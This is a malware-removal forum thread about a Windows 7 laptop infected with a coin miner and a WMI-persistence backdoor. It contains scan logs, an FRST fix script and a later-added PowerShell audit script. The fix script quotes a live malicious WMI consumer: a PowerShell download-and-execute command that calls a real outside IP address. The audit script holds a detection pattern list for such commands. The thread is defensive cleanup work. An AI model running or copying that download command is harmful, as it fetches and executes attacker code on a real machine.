Edited by Ztruker, 29 March 2022 - 05:58 PM.
Rich
Die with memories, not dreams. – Unknown
#23
Posted 29 March 2022 - 07:51 PM
Made one more run with MBAM in Safe Mode again. Full scan with rootkit enabled.
Here is the log:
Malwarebytes
www.malwarebytes.com
-Log Details-
Scan Date: 3/29/22
Scan Time: 9:07 PM
Log File: c1f71280-afc5-11ec-bba8-60eb6909b7df.json
-Software Information-
Version: 4.5.2.157
Components Version: 1.0.1562
Update Package Version: 1.0.53024
License: Trial
-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Marilyn-HP\Administrator
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 373990
Threats Detected: 26
Threats Quarantined: 0
Time Elapsed: 23 min, 37 sec
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
-Scan Details-
Process: 0
(No malicious items detected)
Module: 0
(No malicious items detected)
Registry Key: 12
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{CCF5BCCE-A79A-49A6-A35F-0E85AFE90D46}, No Action By User, 896, 770537, 1.0.53024, , ame, , ,
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\oka, No Action By User, 896, 770535, , , , , ,
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{CCF5BCCE-A79A-49A6-A35F-0E85AFE90D46}, No Action By User, 896, 770535, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C690459B-7A6B-4B99-9F89-0925C173C766}, No Action By User, 5601, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{C690459B-7A6B-4B99-9F89-0925C173C766}, No Action By User, 5601, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1, No Action By User, 5601, 430785, 1.0.53024, , ame, , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{13827ABC-39ED-4F6F-AE2B-4BF749C50C40}, No Action By User, 5601, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{13827ABC-39ED-4F6F-AE2B-4BF749C50C40}, No Action By User, 5601, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2, No Action By User, 5601, 430785, 1.0.53024, , ame, , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{62CDBBDB-A881-4E06-B3D1-C7AA7487212B}, No Action By User, 3643, 417162, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{62CDBBDB-A881-4E06-B3D1-C7AA7487212B}, No Action By User, 3643, 417162, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok, No Action By User, 3643, 417162, 1.0.53024, , ame, , ,
Registry Value: 1
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{CCF5BCCE-A79A-49A6-A35F-0E85AFE90D46}|PATH, No Action By User, 896, 770537, 1.0.53024, , ame, , ,
Registry Data: 0
(No malicious items detected)
Data Stream: 0
(No malicious items detected)
Folder: 1
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET, No Action By User, 3713, 862122, 1.0.53024, , ame, , ,
File: 9
Backdoor.ForShare.WmiBit, C:\WINDOWS\DEBUG\ITEM.DAT, No Action By User, 5820, 430781, 1.0.53024, 2B1C66581342EDE26011C68B, dds, 01704892, BDFA523E5A06C417E30F0DAECB6215F3, 1E8441F0D32D3854E0B3801063F6015A9F09637D77B714F8E58FB8C198693A51
RiskWare.BitCoinMiner, C:\WINDOWS\SYSTEM32\TASKS\OKA, No Action By User, 896, 770535, 1.0.53024, , ame, , 90B48671300C6CB9E665CB4591F3DE78, 2CE1319062C6E170AC2422E1745C85489199F2B763355E2C676F7A36E770688F
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA1, No Action By User, 5601, 430785, , , , , 3C729464934FD3BCA47BF02DE4E49ABA, 44BE98B0751F5F2755062F70E30342F394BB4ACCC00F9F7859E86A94C93242D0
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET\CONFIG.JSON, No Action By User, 3713, 862122, 1.0.53024, , ame, , A1DBFEE625D809262093BE374C2C1F7D, C8559D6211D8115AD1DDC6A460E6A83BC85C2D52A145CB4363FD1F5FF6BE904A
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\lsma22.exe, No Action By User, 3713, 862122, , , , , D6F8C66D27FA8D4172399AFBFBCE6975, BA1E190E87D89FF7943CCA039F357CA8E7C37255D51ACCF49393E2F9119DEC04
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\WinRing0x64.sys, No Action By User, 3713, 862122, , , , , 0C0195C48B6B8582FA6F6373032118DA, 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA2, No Action By User, 5601, 430785, , , , , C972DC0E82B1EA613933267F30E670A1, 16645E167BD786F6182B6C3DA9B12A0EA8BBD31F8B5570A9919400B154C7A811
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\OK, No Action By User, 3643, 417162, , , , , 0534D93E002034D230F134A956875C86, F1F6359CBB158DB7387B964513E9EEC1051930B821094FE8C78E3331245CED3B
Trojan.MalPack.UPX, C:\WINDOWS\TEMP\CONHOY.EXE, No Action By User, 7156, 858908, 1.0.53024, EF5058CCC8725A5C802E0BD8, dds, 01704892, A4FDD182C052C420520377E94442376D, 8B7963CB577113F618ED39F5D2F13BBDC34A5000B454B3FEA6082F0C828EE683
Physical Sector: 0
(No malicious items detected)
WMI: 3
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"", No Action By User, 15642, 868677, , , , , ,
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__EventFilter.Name="killmm3", No Action By User, 15642, 868677, , , , , ,
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:CommandLineEventConsumer.Name="killmm4", No Action By User, 15642, 868677, 1.0.53024, , ame, , ,
(end)
Booted normally after this and conhoy.exe was back in C:\Windows\temp.
Edited by Ztruker, 29 March 2022 - 08:14 PM.
Rich
Die with memories, not dreams. – Unknown
#24
Posted 29 March 2022 - 09:14 PM
Juliet, sent you a PM with some critical info I don't want to post here unless you okay it.
Meantime, I was able to delete 8 to 10 scheduled tasks then boot to Safe mode and delete C:\Windows\Temp\conhoy.exe. Rebooted normally and conhoy.exe was not put back into C:\Windows\Temp. Looks like cleaning up Task Scheduler may have broken the infection loop, that and not having an Internet connection.
Running Malware Bytes again, this time from a normal boot for the first time, to see what it finds. I'll post the log in the morning probably.
Still open to doing a clean install of Windows 10 or 7 if 10 won't install, whatever you think is best.
Edited by Ztruker, 29 March 2022 - 09:14 PM.
Rich
Die with memories, not dreams. – Unknown
#25
Posted 30 March 2022 - 08:03 AM
Still open to doing a clean install of Windows 10 or 7 if 10 won't install, whatever you think is best.
Might have to but let's see what we can do.
Can you try to run this in normal mode first?
Ask Toolbar Updater <== if still listed, remove this from the Control Panel.
Start Farbar Recovery Scan Tool with Administrator privileges
(Right click on the FRST icon and select Run as administrator, just open it and let it wait)
Highlight the text below and select Copy,
beginning with Start:: and finishing with End::
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Start::
CloseProcesses:
SystemRestore:
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe (No File)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe (No File)
HKLM-x32\...\Run: [BFHP] => C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe (No File)
HKLM-x32\...\Run: [AvgUi] => "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=fmw (No File)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\DOCK\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [CCleaner Smart Cleaning] => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {1F798407-258E-40E4-88D5-09E365947CCC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe /s /p 1 (No File)
Task: {2B642391-2C6A-419F-A839-4CD0FB785BDE} - System32\Tasks\oka => c:\windows\inf\aspnet\lsma22.exe (No File)
Task: {53967A89-F06F-46F1-B3BA-D1A5E6FB8CBD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe /L Analysis (No File)
Task: {77B2A611-2A8B-4136-9E0A-B69F523C8EA1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe /EventId=2 (No File)
Task: {88C169BB-B378-4BDD-BF10-DE1BA9564722} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {A4A25E16-BC91-4ACE-9676-11A976F8163C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe /L TuneupTimer (No File)
Task: {AA8D5163-B71D-4B7E-B7C2-215E15C37B54} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe (No File) <==== ATTENTION
Task: {ADC35D8D-8FD8-4112-A8AE-1873442EF63F} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {B6513C2B-1469-4BB6-9007-29A630203521} - System32\Tasks\HPCustPartic.exe_{BE46DC17-3C77-4163-8B22-E2A235CF8971} => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe /installoptin 1444481912 /installreport yes (No File)
Task: {CD1BAF60-5996-47FD-8F0B-1BFC5643A5BC} - \Mysa2 -> No File <==== ATTENTION
Task: {CEAF0A86-3EE6-4454-8C0D-CD971E6FEF8A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe /EventId=1 (No File)
Task: {DE3295F5-6883-451F-8BD7-F00ACCB8E70C} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe /eu (No File)
Task: {DF5AF517-6345-4C01-9682-5D3B6468BCE8} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe -MediaCenterRecoveryTask (No File)
Task: {F094EA7D-B75A-434A-B205-0A3FF27DADDB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe /taskrestart (No File)
Task: {FB7E5A6C-33D5-432D-98AE-AF0F25FE07BD} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
IPSecPolicy: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{7abfca63-0362-4561-bed5-28e417e3aeb4} <==== ATTENTION (Restriction - IP)
S3 ClientAnalyticsService; "C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe" [X]
S4 HomeNetSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 HP Support Assistant Service; "C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe" [X]
S4 McBootDelayStartSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McMPFSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McNaiAnn; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McODS; "C:\Program Files\McAfee\VirusScan\mcods.exe" [X]
S4 mcpltsvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McProxy; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 MSK80Service; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
NETSVC: MsF928BDEEApp -> no filepath.
2022-03-29 17:29 - 2022-03-29 17:29 - 000003448 _____ C:\Windows\system32\Tasks\Mysa1
2022-03-29 17:29 - 2022-03-29 17:29 - 000003444 _____ C:\Windows\system32\Tasks\ok
2022-03-29 17:29 - 2022-03-29 17:29 - 000003342 _____ C:\Windows\system32\Tasks\oka
2022-03-28 13:38 - 2012-06-22 10:29 - 000000000 ____D C:\Program Files (x86)\Conduit
C:\Program Files\Common Files\AV
C:\Program Files (x86)\Coupons
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\PROGRA~1\mcafee\msc\MCCTXM~1.DLL -> No File
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll -> No File
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll -> No File
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\PROGRA~1\mcafee\msc\MCCTXM~1.DLL -> No File
WMI:subscription\CommandLineEventConsumer->killmm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.r...wershell.exeIEX(New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http:/ (the data entry has 362 more characters).]
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\PROGRA~2\mcafee\msc\mcsniepl.dll No File
127.0.0.1 kr1s.ru
127.0.0.1 zcop.ru
127.0.0.1 sql.4i7i.com
Hosts:
CMD: netsh int ip reset
CMD: ipconfig /flushDNS
EmptyTemp:
C:\Windows\Temp\*.*
End::
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Start FRST (FRST64) with Administrator privileges
Press the Fix button. FRST will process the lines copied above from the clipboard.
When finished, a log file (Fixlog.txt) will pop up and be saved in the same location the tool was run from.
Please copy and paste its contents in your next reply.
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
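The fix above removes a permanent WMI event subscription (the CommandLineEventConsumer named killmm4) whose command line is a PowerShell download cradle; that kind of entry survives reboots and is a common way such infections come back. As an added, read-only check that is not part of the helper's FRST script, the following PowerShell (run elevated) lists every permanent WMI subscription on the machine, flags consumers whose command line looks like a download cradle, and shows scheduled tasks whose action runs from C:\Windows\Temp. The pattern list is an assumption chosen for illustration, not a complete signature set.

```powershell
# Added example, not the helper's FRST fix script. Read-only: nothing is removed.
# Run from an elevated PowerShell prompt.
$ns = 'root\subscription'

# Permanent WMI subscriptions live in root\subscription as three linked objects:
# an __EventFilter (WQL trigger), an event consumer (the action) and a binding.
$filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
$consumers = Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer
$bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

# Substrings typical of a download-and-execute consumer (assumption: illustrative
# list, tune it for your environment).
$suspicious = 'DownloadString', 'IEX', 'Invoke-Expression', 'FromBase64String', 'http://'

Write-Host "== CommandLineEventConsumer instances =="
foreach ($c in $consumers) {
    $hits = $suspicious | Where-Object { $c.CommandLineTemplate -match [regex]::Escape($_) }
    [pscustomobject]@{
        Consumer   = $c.Name
        Suspicious = [bool]$hits
        Matched    = ($hits -join ',')
        Template   = $c.CommandLineTemplate
    }
} | Format-List

Write-Host "== Filter -> Consumer bindings (the trigger behind each consumer) =="
foreach ($b in $bindings) {
    [pscustomobject]@{
        Filter   = $b.Filter.Name
        Query    = ($filters | Where-Object Name -eq $b.Filter.Name).Query
        Consumer = $b.Consumer.Name
    }
} | Format-List

# The poster reports conhoy.exe landing in C:\Windows\Temp and Task Scheduler
# entries (e.g. the task "oka") being recreated. List tasks whose action runs
# something from that directory or invokes powershell/cmd so they can be reviewed.
Write-Host "== Scheduled tasks worth reviewing =="
Get-ScheduledTask | Where-Object {
    $_.Actions | Where-Object {
        ($_.Execute + ' ' + $_.Arguments) -match 'Windows\\Temp|powershell|cmd(\.exe)?\s'
    }
} | Select-Object TaskPath, TaskName, State,
    @{n='Action'; e={ ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; ' }} |
  Format-List
```

If any consumer is flagged, compare its name and template with the WMI:subscription line in the FRST log before deciding what to remove; a legitimate consumer (some management agents use them) will not carry a download cradle.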
#26
Posted 30 March 2022 - 08:10 AM
Let's also try this scanner
It's been updated, I'm sure, since I've used this, but I feel sure you can work with the interface and allow it to delete/quarantine what it finds.
RogueKiller
- Download the right version of RogueKiller for your Windows version (32 or 64-bit)
- Once done, move the executable file to your Desktop, right-click on it and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
- Click on the Start Scan button in the right panel, which will bring you to another tab, and click on it again (this time it'll be in the bottom right corner)
- Wait for the scan to complete
- On completion, the results will be displayed
- Check every single entry (threat found), and click on the Remove Selected button
- On completion, the results will be displayed. Click on the Open Report button in the bottom left corner, followed by the Open TXT button (also in the bottom left corner)
- This will open the report in Notepad. Copy/paste its content in your next reply
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
#27
Posted 30 March 2022 - 08:34 AM
Farbar Fixlog.txt:
Rich
Die with memories, not dreams. – Unknown
#28
Posted 30 March 2022 - 09:08 AM
As soon as I allow the laptop to connect to the internet conhoy.exe is put in C:\Windows\temp and the Task Scheduler entries are added again.
I hate to do it but unless RogueKiller cleans everything it's time to do a Clean Install of Windows 10 if it will run on this old PC or Windows 7 Home Premium otherwise. Not much user data needs to be saved.
Rich
Die with memories, not dreams. – Unknown
#29
Posted 30 March 2022 - 09:11 AM
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
#30
Posted 30 March 2022 - 09:45 AM
Still running. 11 threats, 5 PUPs so far. I deleted the scheduled tasks again so after a reboot I'll look at them then connect to the internet and see how long it takes to get reinfected or if that only happens on a reboot.
Edited by Ztruker, 30 March 2022 - 09:46 AM.
Rich
Die with memories, not dreams. – Unknown